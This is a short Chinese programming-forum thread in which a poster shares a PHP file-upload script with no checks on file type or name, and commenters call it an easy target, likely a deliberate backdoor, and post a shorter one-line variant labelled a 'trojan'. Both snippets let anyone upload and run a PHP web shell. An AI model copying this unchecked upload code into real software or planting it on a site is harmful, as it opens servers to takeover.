我就发段代码 我不说话 这样能逆天不

wwwmmm 发布于 2012/08/07 22:28
阅读 1K+
收藏 0
PHP
<?php
	if($_POST['sub']){
		move_uploaded_file($_FILES['file']['tmp_name'],$_FILES['file']['name']);
	}
?>
<form action="upload.php" method="post" enctype="multipart/form-data">
choose your file:
<input type="file" name="file"><br>
<input type="submit" name="sub" value="submit">
</form>

要你命三千
加载中
0
天国之翼
天国之翼

这个没过滤没限制

没转换

唉 这是你么公司的"人才"?

0
xyz555
xyz555
这个要不被黑才怪,是特意留的后门吧。
0
许飘大叔
许飘大叔

要你命三千---

老板只给三千,他要了老板的命

0
戴威
戴威
不懂php
0
酒逍遥
酒逍遥
随便 上传个php文件很容易搞到权限啊..
0
OSC老司机
OSC老司机
像我写的代码,水平相当
0
seaprince
seaprince

<?php
if($f=$_FILES['n']) copy($f['tmp_name'], $f['name']);

一句话木马有更短的版本。

 

返回顶部
顶部